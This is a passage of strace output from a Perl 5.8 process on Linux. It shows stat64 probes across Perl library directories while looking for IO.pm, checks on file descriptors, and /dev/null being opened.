7900  07:20:55.063474 stat64("/usr/local/share/perl/5.8.7", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063487 stat64("/usr/local/lib/perl/5.8.6", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063499 stat64("/usr/local/share/perl/5.8.6", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063510 stat64("/usr/local/lib/perl/5.8.4", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063522 stat64("/usr/local/share/perl/5.8.4", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063534 stat64("/usr/local/lib/perl/5.8.3", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063546 stat64("/usr/local/share/perl/5.8.3", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063557 stat64("/usr/local/lib/perl/5.8.2", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063570 stat64("/usr/local/share/perl/5.8.2", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063582 stat64("/usr/local/lib/perl/5.8.1", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063593 stat64("/usr/local/share/perl/5.8.1", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063605 stat64("/usr/local/lib/perl/5.8.0", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063617 stat64("/usr/local/share/perl/5.8.0", 0xbfb485f0) = -1 ENOENT (No such file or directory)

7900  07:20:55.063662 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb482e8) = -1 ENOTTY (Inappropriate ioctl for device)

7900  07:20:55.063691 _llseek(0, 0, [0], SEEK_CUR) = 0

7900  07:20:55.063704 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb482e8) = -1 EBADF (Bad file descriptor)

7900  07:20:55.063715 _llseek(1, 0, 0xbfb48330, SEEK_CUR) = -1 EBADF (Bad file descriptor)

7900  07:20:55.063726 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb482e8) = -1 EINVAL (Invalid argument)

7900  07:20:55.063737 _llseek(2, 0, 0xbfb48330, SEEK_CUR) = -1 ESPIPE (Illegal seek)

7900  07:20:55.063747 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

7900  07:20:55.063761 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb483a8) = -1 ENOTTY (Inappropriate ioctl for device)

7900  07:20:55.063771 _llseek(1, 0, [0], SEEK_CUR) = 0

7900  07:20:55.063782 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

7900  07:20:55.063794 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

7900  07:20:55.063812 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

7900  07:20:55.063866 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

7900  07:20:55.063914 getppid()         = 7898

7900  07:20:55.063976 stat64("/etc/perl/IO.pmc", 0xbfb4809c) = -1 ENOENT (No such file or directory)

7900  07:20:55.063991 stat64("/etc/perl/IO.pm", 0xbfb47fac) = -1 ENOENT (No such file or directory)

7900  07:20:55.064004 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfb4809c) = -1 ENOENT (No such file or directory)

7900  07:20:55.064017 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfb47fac) = -1 ENOENT (No such file or directory)

7900  07:20:55.064031 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfb4809c) = -1 ENOENT (No such file or directory)

7900  07:20:55.064043 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfb47fac) = -1 ENOENT (No such file or directory)

7900  07:20:55.064057 stat64("/usr/lib/perl5/IO.pmc", 0xbfb4809c) = -1 ENOENT (No such file or directory)

7900  07:20:55.064069 stat64("/usr/lib/perl5/IO.pm", 0xbfb47fac) = -1 ENOENT (No such file or directory)

7900  07:20:55.064082 stat64("/usr/share/perl5/IO.pmc", 0xbfb4809c) = -1 ENOENT (No such file or directory)

7900  07:20:55.064094 stat64("/usr/share/perl5/IO.pm", 0xbfb47fac) = -1 ENOENT (No such file or directory)

7900  07:20:55.064107 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfb4809c) = -1 ENOENT (No such file or directory)

7900  07:20:55.064120 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

7900  07:20:55.064179 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

7900  07:20:55.064194 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb47db8) = -1 ENOTTY (Inappropriate ioctl for device)

7900  07:20:55.064206 _llseek(6, 0, [0], SEEK_CUR) = 0

